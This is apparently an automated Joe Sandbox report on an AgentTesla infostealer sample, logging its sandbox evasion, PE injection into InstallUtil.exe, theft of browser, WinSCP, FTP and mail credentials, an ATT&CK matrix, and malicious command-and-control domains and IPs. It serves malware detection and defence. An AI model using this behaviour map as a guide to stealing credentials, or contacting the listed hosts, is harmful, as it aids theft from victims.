Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -594843s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594843	Jump to behavior

Source: wva4mZuUb4.exe, 00000000.00000002.1922738564.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, wva4mZuUb4.exe, 00000000.00000002.1909018822.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxTray
Source: wva4mZuUb4.exe, 00000000.00000002.1909018822.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q#SOFTWARE\VMware, Inc.\VMware VGAuth
Source: InstallUtil.exe, 0000000A.00000002.2492410266.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: CCE008	Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Queries volume information: C:\Users\user\Desktop\wva4mZuUb4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.wva4mZuUb4.exe.401b818.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f9dfba.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f744ea.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3ff153a.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.401b818.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f9dfba.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f744ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3ff153a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2491018423.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2436, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2436, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.wva4mZuUb4.exe.401b818.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f9dfba.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f744ea.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3ff153a.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.401b818.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f9dfba.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f744ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3ff153a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2491018423.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2436, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	311 Process Injection	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
wva4mZuUb4.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DarkTortilla
wva4mZuUb4.exe	100%	Avira	TR/Kryptik.vxcuo
wva4mZuUb4.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://aminhacorretora.com.br	100%	Avira URL Cloud	malware
http://ftp.aminhacorretora.com.br	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
aminhacorretora.com.br	162.241.203.30	true	true		unknown
ftp.aminhacorretora.com.br	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://aminhacorretora.com.br	InstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ftp.aminhacorretora.com.br	InstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	InstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.241.203.30	aminhacorretora.com.br	United States		26337	OIS1US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569286
Start date and time:	2024-12-05 17:27:47 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wva4mZuUb4.exe renamed because original name is a hash value
Original Sample Name:	872f1970c19bbf2031fe43f9ed034f1edd2763e6ecda2de368336da3312d8463.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 141 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: wva4mZuUb4.exe

Simulations

Behavior and APIs

Time	Type	Description
11:28:44	API Interceptor	219x Sleep call for process: wva4mZuUb4.exe modified
12:39:28	API Interceptor	571x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.241.203.30	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	nossoplayer.me/admin/
	RjGM2z2Z3gVHbRl.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/eauu/?DZDL=WHu5pNat8uHfzRxaB9vtQ4eIh6FN4j/LlAnIasWF7xCzNp7gljTYY7GdEKRxmLt8YdbcyrQMPNW8Q0wryNhuApS+Kh6rZS0ucw==&XJE=v0GXajs0Cfa
	PI5102295.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?4hzh=z6Y8Z0&a8GP-0=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL553wQlR/hos/LA==
	SecuriteInfo.com.Trojan.GenericKD.61688138.7209.1529.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?bH=ZR2t9tZxXpFp&j48x=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL58jtUiF/uIknLA==
	ZsFMADRfZB.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?2dyL8P=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlO3cbHe0QClKYeKQ==&I6Ah=eFQ8RbYHBTF0_Z
	SecuriteInfo.com.Trojan.DownLoaderNET.447.13310.17565.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?t0GX=kdo4s&9rW=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw
	SecuriteInfo.com.Trojan.DownloaderNET.345.11377.31950.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?9ro=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw&q2ML=zTqLQN
